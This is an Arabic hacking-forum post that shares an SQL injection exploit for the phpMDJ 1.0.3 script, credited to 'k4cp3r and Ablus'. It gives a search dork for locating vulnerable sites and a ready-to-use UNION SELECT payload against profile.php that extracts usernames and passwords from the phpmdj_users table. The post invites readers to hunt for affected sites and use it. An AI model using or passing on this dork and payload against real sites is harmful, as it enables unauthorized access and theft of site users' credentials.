ثغرة في سكريبت phpMDJ 1.0.3
[align=center]السلام عليكم ورحمة الله وبركاته
جبت لكم اليوم ثغرة في سكريبت phpMDJ 1.0.3
الثغرة من نوع SQL INJECTION
الذي يعشقها الكثير
نبدأ
دورك البحث عن المواقع المصابة
طريقة الإستغلال
الثغرة من إكتشاف k4cp3r and Ablus
إن شاء الله تستفيدوا
موفقين بإذن الله ...[/align]
جبت لكم اليوم ثغرة في سكريبت phpMDJ 1.0.3
الثغرة من نوع SQL INJECTION
الذي يعشقها الكثير
نبدأ
دورك البحث عن المواقع المصابة
PHP:
DORK: Inurl:"profile.php?idطريقة الإستغلال
PHP:
tp://site/path/profile.php?id=-1 union select 1,2,3,mdp,5,6,pseudo,8,9,10,11,12,13,14,15,16 FROM phpmdj_users where id=1--الثغرة من إكتشاف k4cp3r and Ablus
إن شاء الله تستفيدوا
موفقين بإذن الله ...[/align]
اسم الموضوع : ثغرة في سكريبت phpMDJ 1.0.3
|
المصدر : قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات